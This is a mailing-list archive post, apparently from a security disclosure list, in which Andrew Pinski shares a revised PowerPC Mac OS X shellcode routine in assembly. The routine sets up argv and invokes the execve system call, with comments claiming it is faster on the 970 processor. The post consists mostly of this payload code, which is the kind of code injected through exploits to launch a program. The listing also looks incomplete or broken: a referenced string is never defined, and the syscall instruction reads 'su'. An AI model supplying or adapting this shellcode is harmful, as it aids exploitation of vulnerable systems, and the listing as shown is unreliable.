lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <C2D099FA-DC91-11D7-811A-000393A6D2F2@physics.uc.edu>
From: pinskia at physics.uc.edu (Andrew Pinski)
Subject: PPC OSX Shellcode ASM

The original code for execeve can be improved on, yes it is the same 
size (but faster for 970):
_main:
	bcl 20,31,"L00000000001$pb"  ;fast way of not flushing the lr link 
stack
"L00000000001$pb":
	mflr r3   ; r3 = main+8
	xor r5,r5,r5  ; r5 = 0
	addi r3, r3, lo16(string)  ;r3 = string
	stw r3, -8(r1)   ;argv[0] = string
	stw r5, -4(r1)	; argv[1] = NULL
	subi r4, r1,8	;r4 = pointer to argv[]
	li r0, 59	; r0 = 59 execve()
	su		; execve(r3, r4, r5)

Thanks,
Andrew Pinski


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ